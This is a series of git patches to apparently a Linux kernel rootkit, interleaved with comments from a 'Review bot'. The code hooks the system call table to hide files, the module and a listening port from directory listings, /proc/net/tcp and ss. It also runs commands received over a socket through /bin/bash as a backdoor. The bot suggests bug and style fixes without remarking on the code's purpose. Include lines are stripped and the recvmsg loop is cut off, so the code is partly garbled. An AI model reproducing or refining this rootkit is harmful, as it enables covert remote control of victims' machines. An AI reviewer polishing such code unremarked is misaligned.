From: Valentin Lechner Date: Sun, 8 Dec 2019 12:00:46 +0100 Subject: [PATCH 05/12] Skript fr Code Generierung angepasst so dass die explizite Definition der Variablen im c File steht und im Header File die Deklaration fr externes --- src/cr3473_5y563n.sh | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/src/cr3473_5y563n.sh b/src/cr3473_5y563n.sh index 17d133d..1a1f56c 100755 --- a/src/cr3473_5y563n.sh +++ b/src/cr3473_5y563n.sh @@ -1,19 +1,32 @@ #!/usr/bin/env bash + SCRIPTPATH="$( cd "$(dirname "$0")" ; pwd -P )" + SRCS_H="$SCRIPTPATH""/headers" + +SGENS="$SCRIPTPATH""/5y563n.c" SGENH="$SRCS_H""/5y563n.h" smap="/boot/System.map-$(uname -r)" +echo -e '#include "5y563n.h"' > "$SGENS" + echo -e "#pragma once" > "$SGENH" echo -e "#include " >> "$SGENH" + symbline=$(cat $smap | grep '\Wsys_call_table$') set $symbline + [ -z "$symbline" ] && echo "No SysCall Table Value from System.map found" && exit 2; -echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENH" + +echo -e "extern void** sys_call_table;" >> "$SGENH" + +echo -e "void** sys_call_table = (void**)0x$1;" >> "$SGENS" procline=$(cat $smap | grep '\Wproc_modules_operations$') set $procline -echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENH" \ No newline at end of file +echo -e "extern struct file_operations* proc_modules_operations;">> "$SGENH" + +echo -e "struct file_operations* proc_modules_operations = (struct file_operations*)0x$1;" >> "$SGENS" \ No newline at end of file From 800779a3764e84b18b1a1c9b5047b3c315f5cc4a Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:01:37 +0100 Subject: [PATCH 06/12] ifdef HARMLESS um ansonsten nicht bentigte Var --- src/50ck3t.c | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/src/50ck3t.c b/src/50ck3t.c index f925d07..42f98b5 100644 --- a/src/50ck3t.c +++ b/src/50ck3t.c 
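Review bot: The new `proc_modules_operations` block has no guard equivalent to the `symbline` one: if the grep matches nothing, `set $procline` with no arguments leaves the positional parameters from the earlier `set $symbline` untouched, and the generated 5y563n.c silently carries the sys_call_table address as `proc_modules_operations`. Mirror the existing check before the `set`, `[ -z "$procline" ] && echo "No proc_modules_operations Value from System.map found" && exit 2;`. `$smap` is used unquoted in both `cat $smap | grep` pipelines; `grep '\Wsys_call_table$' "$smap"` avoids both the word-splitting and the useless cat.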
@@ -34,15 +34,18 @@ #ifdef HARMLESS #else #include + #include "610b415.h" #endif /**** types ******************************************************************* *******************************************************************************/ #ifdef HARMLESS #else + static char *SEnvP[] = { "HOME=/", NULL }; + #endif struct tcp_conn_handler_data{ struct sockaddr_in *FAddress; @@ -186,8 +189,10 @@ int connection_handler(void *AData){ int LRet; int LLen = 49; unsigned char LInBuf[LLen+1]; +#ifdef HARMLESS unsigned char LOutBuf[LLen+1]; - +#else +#endif DECLARE_WAITQUEUE(recv_wait, current); allow_signal(SIGKILL|SIGSTOP); @@ -248,7 +253,10 @@ int connection_handler(void *AData){ } #else int Ret; + + printk(LInBuf); + char *LArgV[] = {"/bin/bash", "-c", LInBuf, NULL}; printk("Calling usermodehelper"); Ret = call_usermodehelper(LArgV[0], LArgV, SEnvP, UMH_WAIT_EXEC); From 53e95217c228d69de63606098e999c8fae491d96 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:02:08 +0100 Subject: [PATCH 07/12] Removing single-line comments --- src/637d3n75.c | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/src/637d3n75.c b/src/637d3n75.c index 24afd60..a6a6aee 100644 --- a/src/637d3n75.c +++ b/src/637d3n75.c @@ -23,6 +23,10 @@ *******************************************************************************/ #include "637d3n75.h" +/*** var ******************************************************************** +*******************************************************************************/ + +sys_getdents_ptr sys_getdents_orig; /*******************************************************************************/ 
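Review bot: Patch 07's hunk adds the definition `sys_getdents_ptr sys_getdents_orig;` to 637d3n75.c, but nothing in this series shows 637d3n75.h dropping its own `sys_getdents_t sys_getdents_orig = NULL;` or 8008135.h renaming the typedef from `sys_getdents_t` to `sys_getdents_ptr`; unless a commit outside this excerpt does both, this line is an undeclared type and a second definition of the same symbol. If the header is updated, it should read `extern sys_getdents_ptr sys_getdents_orig;` so that this file holds the only definition. The enclosing file content around the hunk (the function header and the `#include`) is unchanged.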
@@ -48,22 +52,20 @@ asmlinkage long sys_getdents_new(unsigned int fd, dbuf = (char*)dirent; - // go through the entries, looking for one that has our prefix for (boff = 0; boff < ret;) { ent = (struct linux_dirent*)(dbuf + boff); - // if it has hide prefix or module name anywhere, hide it + if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0) || (strstr(ent->d_name, MODULE_NAME) != NULL)) { - // remove this entry by copying everything after it forward - // and adjust the length reported + memcpy(dbuf + boff, dbuf + boff + ent->d_reclen, ret - (boff + ent->d_reclen)); ret -= ent->d_reclen; } else { - // on to the next entry + boff += ent->d_reclen; } } From ed5b2fa92afdfb23139cd04561436d9f29d75f71 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:02:33 +0100 Subject: [PATCH 08/12] CleanUp --- src/8008135.c | 38 ++++++++++++-------------------------- 1 file changed, 12 insertions(+), 26 deletions(-) diff --git a/src/8008135.c b/src/8008135.c index c8be593..851ce00 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -22,11 +22,6 @@ /**** includes ***************************************************************** *******************************************************************************/ #include "8008135.h" -#include "50ck3t.h" -#include "637d3n75.h" -#include "h1d3m0dul3.h" -#include "h1d3p0r7.h" -#include "p463unpr073c7.h" /*******************************************************************************/ 
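Review bot: The removed `//` comments explained the intent of each branch of the loop and are replaced by blank lines, which leaves the body less readable than before rather than cleaner. If the project's style rejects `//` line comments, the same text can be kept as `/* … */` comments, and the blank lines left in their place should go with the comments they stood in for. sys_getdents_new starts and ends outside the hunk.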
@@ -37,48 +32,39 @@ * RETURNS: int *******************************************************************************/ static int __init init_8008135(void) { - printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); - - sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; - - printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); + sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; + sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; - // turn write protect off wprotectionoff(); - - // add our new handlers - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; - - orig_read = (read_ptr)sys_call_table[__NR_read]; - - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; - // turn write protect back on + sys_call_table[__NR_getdents] = sys_getdents_new; + sys_call_table[__NR_read] = sys_read_fake; + wprotectionon(); - printk(KERN_INFO "New syscall in place\n"); network_server_init(); hide_module(); - printk(KERN_INFO "Module hidden"); return 0; } /*** FUNCTION **************************************************************** * NAME: 8008135_exit -* DESCRIPTION: unloading Kernel Module +* DESCRIPTION: unloading Kernel Module, restoring the original system call table * PARAMETERS: - * RETURNS: - *******************************************************************************/ static void __exit exit_8008135(void) { + network_server_exit(); + wprotectionoff(); - sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; - sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; - // turn write protect back on + + sys_call_table[__NR_getdents] = sys_getdents_orig; + sys_call_table[__NR_read] = sys_read_orig; + wprotectionon(); - printk(KERN_INFO "Old syscall back\n"); } /*******************************************************************************/ From c897df31ec9d9bb3e44d321d13a88cbdd1adff05 Mon Sep 17 00:00:00 2001 
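Review bot: The header comment above the exit routine still reads `* NAME: 8008135_exit` while the definition is `exit_8008135`; update it to `* NAME: exit_8008135`, and the init block's NAME line above the hunk most likely has the same mismatch. The new assignments `sys_call_table[__NR_getdents] = sys_getdents_new;` and `sys_call_table[__NR_read] = sys_read_fake;` store function pointers into what the generator script declares as `void**` without the casts the removed lines carried, which compilers flag as an incompatible pointer type; either keep a cast or make the table's element type a function-pointer typedef.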
From: Valentin Lechner Date: Sun, 8 Dec 2019 12:04:42 +0100 Subject: [PATCH 09/12] Dude, das war richtig schlecht geschriebener Code --- src/h1d3p0r7.c | 61 ++++++++++++++++++++++++++++++++------------------ 1 file changed, 39 insertions(+), 22 deletions(-) diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index f16e715..026f7b5 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -23,6 +23,11 @@ *******************************************************************************/ #include "h1d3p0r7.h" +/**** var ********************************************************************** +*******************************************************************************/ + +sys_read_ptr sys_read_orig; + /*******************************************************************************/ /*** FUNCTION **************************************************************** @@ -32,8 +37,8 @@ * RETURNS: *******************************************************************************/ -asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count) { long result, bp, diff_in_bytes; char *kbuf, *start_line, *end_line, *port_num; 
@@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf, struct path file_path; // run real read - result = (*orig_read)(fd,buf,count); - if (result <= 0) + result = (*sys_read_orig)(fd, buf, count); + + if (result <= 0){ return result; + } + - // get pathname - // CITATION [8] from report current_files = current->files; files_table = files_fdtable(current_files); file_path = files_table->fd[fd]->f_path; - pathname = d_path(&file_path,pbuf,256*sizeof(char)); - // if virtual file /proc/net/tcp - if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) { - // copy from user to kernelspace; - if (!access_ok(VERIFY_READ,buf,result)) + pathname = d_path(&file_path, pbuf, 256*sizeof(char)); + + + if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) { + + if (!access_ok(VERIFY_READ, buf, result)){ return -1; - if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL) + } + if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){ return -1; - if (copy_from_user(kbuf,buf,result)) + } + if (copy_from_user(kbuf, buf, result)){ return -1; + } + - // filter out hidden ports - start_line = strchr(kbuf,':') - 4; // skip first line + start_line = strchr(kbuf, ':') - 4; diff_in_bytes = (start_line - kbuf) * sizeof(char); + for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) { + start_line = kbuf + bp; - port_num = strchr(strchr(start_line,':') + 1,':') + 1; - end_line = strchr(start_line,'\n'); + port_num = strchr(strchr(start_line, ':') + 1, ':') + 1; + end_line = strchr(start_line, '\n'); diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char); - if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port - memmove(start_line,end_line + 1, // delete line in file - result - bp - diff_in_bytes); + + if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) { + + memmove(start_line, end_line + 1, + result - bp - diff_in_bytes); + result -= diff_in_bytes; } } // copy from kernel to userspace - if (!access_ok(VERIFY_WRITE,buf,result)) + if 
(!access_ok(VERIFY_WRITE, buf, result)){ return EINVAL; - if (copy_to_user(buf,kbuf,result)) + } + if (copy_to_user(buf, kbuf, result)){ return EINVAL; + } kfree(kbuf); } // return number of bytes read From 6ad05f1c20b0407084a3014c60aeb78b5faa7918 Mon Sep 17 00:00:00 2001 From: Valentin Lechner Date: Sun, 8 Dec 2019 12:05:07 +0100 Subject: [PATCH 10/12] OutSourcing --- src/headers/637d3n75.h | 40 +++++++++++++++++++++++++++++++++++-- src/headers/8008135.h | 37 +++++++++++----------------------- src/headers/h1d3m0dul3.h | 4 ++++ src/headers/h1d3p0r7.h | 33 +++++++++++++++++++++++++++--- src/headers/p463unpr073c7.h | 2 ++ 5 files changed, 86 insertions(+), 30 deletions(-) diff --git a/src/headers/637d3n75.h b/src/headers/637d3n75.h index feab7cf..26f8ff7 100644 --- a/src/headers/637d3n75.h +++ b/src/headers/637d3n75.h 
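Review bot: The error exits mix conventions — the three copy-in checks `return -1;` while the two copy-out checks `return EINVAL;` with a positive value — so a caller of read() can receive a positive errno as if it were a byte count; use one form throughout, a negative errno such as `-EFAULT`, as the kernel convention requires. The rewrite also leaves double blank lines after several closing braces. sys_read_fake begins in the preceding hunk and its final `return result;` lies beyond this one.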
@@ -17,12 +17,48 @@ * with this program. If not, see . */ +/*******************************************************************************/ + + #ifndef SRC_HEADERS_637d3n75_H #define SRC_HEADERS_637d3n75_H -/**** var ******************************************************************** + +/**** include **************************************************************** *******************************************************************************/ -sys_getdents_t sys_getdents_orig = NULL; +#include +#include +#include +#include + +#include "5y563n.h" + +#define HIDE_PREFIX "8008135." +#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) + +#define MODULE_NAME "8008135" +#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) + +#define __NR_getdents 78 + +/**** type ******************************************************************** +******************************************************************************/ + +struct linux_dirent { + unsigned long d_ino; + unsigned long d_off; + unsigned short d_reclen; + char d_name[1]; +}; + +typedef asmlinkage long (*sys_getdents_ptr)(unsigned int fd, + struct linux_dirent __user *dirent, + unsigned int count); + +/*** var ******************************************************************** +*******************************************************************************/ + +extern sys_getdents_ptr sys_getdents_orig; extern asmlinkage long sys_getdents_new(unsigned int fd, diff --git a/src/headers/8008135.h b/src/headers/8008135.h index 99bc790..d6b5bef 100644 --- a/src/headers/8008135.h +++ b/src/headers/8008135.h 
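Review bot: `#define __NR_getdents 78` hardcodes one architecture's syscall number under a name in the implementation's reserved namespace (double-underscore prefix) that the kernel's own `<asm/unistd.h>` already defines; if one of the includes above (illegible in this rendering) pulls that header in, the redefinition is at best a warning and at worst a silent mismatch on another architecture. The same pattern appears as `#define __NR_read 0` in this commit's h1d3p0r7.h hunk and `#define __NR_recvmsg 47` in the last commit of the series. The comment that the removed copy of `struct linux_dirent` in 8008135.h carried on `d_name[1]` ("the struct value is actually longer than this, and d_name is variable width") should move with the struct rather than be dropped, since it explains why a flexible array member is not used.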
@@ -18,16 +18,24 @@ */ #ifndef SRC_HEADERS_8008135_H #define SRC_HEADERS_8008135_H + /**** Includes *************************************************************** *******************************************************************************/ +#include "637d3n75.h" +#include "50ck3t.h" +#include "h1d3m0dul3.h" +#include "h1d3p0r7.h" +#include "p463unpr073c7.h" + +// To set module data #include +// To communicate kernel #include +/* #include -#include #include -#include -#include "5y563n.h" +#include #include #include #include @@ -36,18 +44,10 @@ #include #include #include - +*/ /**** Defines ***************************************************************** *******************************************************************************/ -#define GETDENTS_SYSCALL_NUM 78 -#define READ_SYSCALL_NUM 0 - -#define HIDE_PREFIX "8008135." -#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) - -#define MODULE_NAME "8008135" -#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) /**** Modinfo **************************************************************** *******************************************************************************/ @@ -57,18 +57,5 @@ MODULE_AUTHOR("JanKoernerEnterprises"); MODULE_DESCRIPTION("8008135"); MODULE_VERSION("0.1"); -/**** type ******************************************************************* -*******************************************************************************/ -struct linux_dirent { - unsigned long d_ino; - unsigned long d_off; - unsigned short d_reclen; // d_reclen is the way to tell the length of this entry - char d_name[1]; // the struct value is actually longer than this, and d_name is variable width. -}; -typedef asmlinkage long (*sys_getdents_t)(unsigned int fd, - struct linux_dirent __user *dirent, - unsigned int count); -typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, - size_t count); #endif diff --git a/src/headers/h1d3m0dul3.h b/src/headers/h1d3m0dul3.h index 14182ae..f70db50 100644 
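Review bot: The `/*` opened after the two retained includes (closed by `+*/` in the next hunk) turns a dozen includes into commented-out code; delete them instead, since git keeps the history and a commented block only rots. The two comments kept, `// To set module data` and `// To communicate kernel`, are not clear about what each header provides — the second is not a sentence — and should name the facility the include is for. The include targets themselves are not legible in this rendering, so I cannot check which of the commented ones are still needed.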
--- a/src/headers/h1d3m0dul3.h +++ b/src/headers/h1d3m0dul3.h @@ -21,6 +21,10 @@ #define SRC_HEADERS_h1d3m0dul3_H +#include +#include + + extern void hide_module(void); #endif diff --git a/src/headers/h1d3p0r7.h b/src/headers/h1d3p0r7.h index 65ab39d..a9e8e8b 100644 --- a/src/headers/h1d3p0r7.h +++ b/src/headers/h1d3p0r7.h @@ -20,12 +20,39 @@ #ifndef SRC_HEADERS_h1d3p0r7_H #define SRC_HEADERS_h1d3p0r7_H + +/**** includes **************************************************************** +*******************************************************************************/ + #include "50ck3t.h" + +/* are those really all needed? */ +#include +#include +#include +#include +#include +#include +#include +#include +#include + + +#define __NR_read 0 + + + +typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, + char __user *buf, + size_t count); + + /**** var ********************************************************************** *******************************************************************************/ -read_ptr orig_read; -extern asmlinkage long hacked_read(unsigned int fd, char __user *buf, - size_t count) +extern sys_read_ptr sys_read_orig; + +extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, + size_t count); #endif diff --git a/src/headers/p463unpr073c7.h b/src/headers/p463unpr073c7.h index a474e8f..c4aafb8 100644 --- a/src/headers/p463unpr073c7.h +++ b/src/headers/p463unpr073c7.h @@ -20,6 +20,8 @@ #ifndef SRC_HEADERS_p463unpr073c7_H #define SRC_HEADERS_p463unpr073c7_H +#include +#include "asm/special_insns.h" /**** defines ***************************************************************** *******************************************************************************/ From 7a486df14cdd82cbd9f0327f36bc5f6c91ee6774 Mon Sep 17 00:00:00 2001 
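Review bot: `/* are those really all needed? */` above the new include list in h1d3p0r7.h is a question left for the reader; the commit should answer it, by pruning the list or stating what each header is for, rather than ship it. The new typedef `sys_read_ptr` gets no comment; a single line such as `/* signature of the original read syscall entry, saved in sys_read_orig */` would match the section-header style the file uses. Two consecutive blank lines are left both before and after `#define __NR_read 0`.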
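Review bot: `#include "asm/special_insns.h"` in p463unpr073c7.h uses the quoted form for a kernel header, while the include added on the line above appears (its argument stripped by the rendering, consistent with an angle-bracket include) to use the system form; quoted includes search the including file's directory first, so a local file of that name would shadow the kernel's. Use `#include <asm/special_insns.h>` for consistency.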
From: Valentin Lechner Date: Sun, 8 Dec 2019 12:05:40 +0100 Subject: [PATCH 11/12] Updating gitignore and Makefile for new needs --- .gitignore | 4 ++-- Makefile | 5 +++-- 2 files changed, 5 insertions(+), 4 deletions(-) diff --git a/.gitignore b/.gitignore index 8359f9d..a0b166b 100644 --- a/.gitignore +++ b/.gitignore @@ -9,10 +9,10 @@ sysgen.h *.a *.ko *.o - +*5y563n.* *~ *.symvers *.order .tmp_versions/ *.cmd -.vscode/ \ No newline at end of file +.vscode/ diff --git a/Makefile b/Makefile index 1c688ae..7993ed2 100644 --- a/Makefile +++ b/Makefile @@ -19,14 +19,15 @@ INCL_H := $(PWD)/$(INCL_S)/headers obj-m += $(MNAME).o # Core $(MNAME)-y += src/$(MNAME).o -$(MNAME)-y += src/50ck3t.o $(MNAME)-y += src/637d3n75.o +$(MNAME)-y += src/50ck3t.o $(MNAME)-y += src/h1d3p0r7.o $(MNAME)-y += src/h1d3m0dul3.o $(MNAME)-y += src/p463unpr073c7.o +$(MNAME)-y += src/5y563n.o # Includes for header files etc -ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) +ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) -Wall all: $(shell $(SRCS_S)/cr3473_5y563n.sh) From 3e30a6df32ee4d5c3f374b26d9e2a694154bbd9c Mon Sep 17 00:00:00 2001 From: Jan Koerner Date: Sun, 8 Dec 2019 13:33:50 +0100 Subject: [PATCH 12/12] Socket von ss verstecken --- src/8008135.c | 3 ++ src/h1d3p0r7.c | 77 ++++++++++++++++++++++++++++++++++++++++++ src/headers/h1d3p0r7.h | 8 +++-- 3 files changed, 86 insertions(+), 2 deletions(-) diff --git a/src/8008135.c b/src/8008135.c index 851ce00..2484f63 100644 --- a/src/8008135.c +++ b/src/8008135.c @@ -35,11 +35,13 @@ static int __init init_8008135(void) { sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents]; sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read]; + sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg]; wprotectionoff(); sys_call_table[__NR_getdents] = sys_getdents_new; sys_call_table[__NR_read] = sys_read_fake; + sys_call_table[__NR_recvmsg] = my_recvmsg_syscall; wprotectionon(); 
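Review bot: `sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];` casts through `void *` while the two lines above cast to the typed function pointer (`(sys_read_ptr)`), so the three saves now read differently for no reason; `(original_recvmsg_syscall)` would match, and avoids the object-pointer-to-function-pointer conversion that C does not define. init_8008135 continues outside the hunk.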
@@ -63,6 +65,7 @@ static void __exit exit_8008135(void) { sys_call_table[__NR_getdents] = sys_getdents_orig; sys_call_table[__NR_read] = sys_read_orig; + sys_call_table[__NR_recvmsg] = sys_recvmsg_orig; wprotectionon(); } diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c index 026f7b5..5d16ec0 100644 --- a/src/h1d3p0r7.c +++ b/src/h1d3p0r7.c @@ -27,6 +27,7 @@ *******************************************************************************/ sys_read_ptr sys_read_orig; +original_recvmsg_syscall sys_recvmsg_orig; /*******************************************************************************/ 
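Review bot: The new global `original_recvmsg_syscall sys_recvmsg_orig;` breaks the naming scheme the line above establishes (`sys_read_ptr sys_read_orig;`, with `sys_read_fake` as the replacement): the typedef would be `sys_recvmsg_ptr` and the replacement `sys_recvmsg_fake` rather than `my_recvmsg_syscall`. Renaming now, while the symbol is new, keeps the three hooks readable side by side. Neither definition has a comment; `/* saved original entries, restored in exit_8008135 */` above both would document the ownership.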
@@ -106,3 +107,79 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, // return number of bytes read return result; } + +/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original + `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink + socket with the help of some netlink utility macros. If a netlink socket is being used, we + iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the + source and destination ports with our list of hidden ones. In order to hide an entry we copy + the remaining entries over it and adjust the data length which is returned to the user. */ + +asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags) +{ + long ret; + struct nlmsghdr *nlh; + long count; + int found; + char *stream; + int offset; + int i; + struct inet_diag_msg *r; + int port; + /* Call original `recvmsg` syscall */ + ret = sys_recvmsg_orig(sockfd, msg, flags); + + /* Some error occured. Don't do anything. */ + if (ret < 0) + return ret; + + /* Extract netlink message header from message */ + nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base); + + /* Number of bytes remaining in message stream */ + count = ret; + + /* Set flag specifying whether message contains data to be masked */ + found = 1; + + /* NLMSG_OK: This macro will return true if a netlink message was received. It + essentially checks whether it's safe to parse the netlink message (if indeed + is a netlink message) using the other NLMSG_* macros. */ + while (NLMSG_OK(nlh, count)) { + + if (found == 0) + /* NLMSG_NEXT: Many netlink protocols have request messages that result + in multiple response messages. In these cases, multiple responses will + be copied into the `msg` buffer. This macro can be used to walk the + chain of responses. Returns NULL in the event the message is the last + in the chain for the given buffer. 
*/ + nlh = NLMSG_NEXT(nlh, count); + + r = NLMSG_DATA(nlh); + port = ntohs(r->id.idiag_sport); + if(port == 2325){ + /* Message contains data to be masked */ + found = 1; + }else{ + found = 0; + continue; + } + + + stream = (char *) nlh; + + /* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it + up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */ + offset = NLMSG_ALIGN((nlh)->nlmsg_len); + + /* Copy remaining entries over the data to be masked */ + for (i=0 ; i #include #include +#include /* Needed for ntohs */ #define __NR_read 0 - +#define __NR_recvmsg 47 typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, char __user *buf, size_t count); +typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned); /**** var ********************************************************************** *******************************************************************************/ extern sys_read_ptr sys_read_orig; - extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, size_t count); +extern original_recvmsg_syscall sys_recvmsg_orig; +extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned); + #endif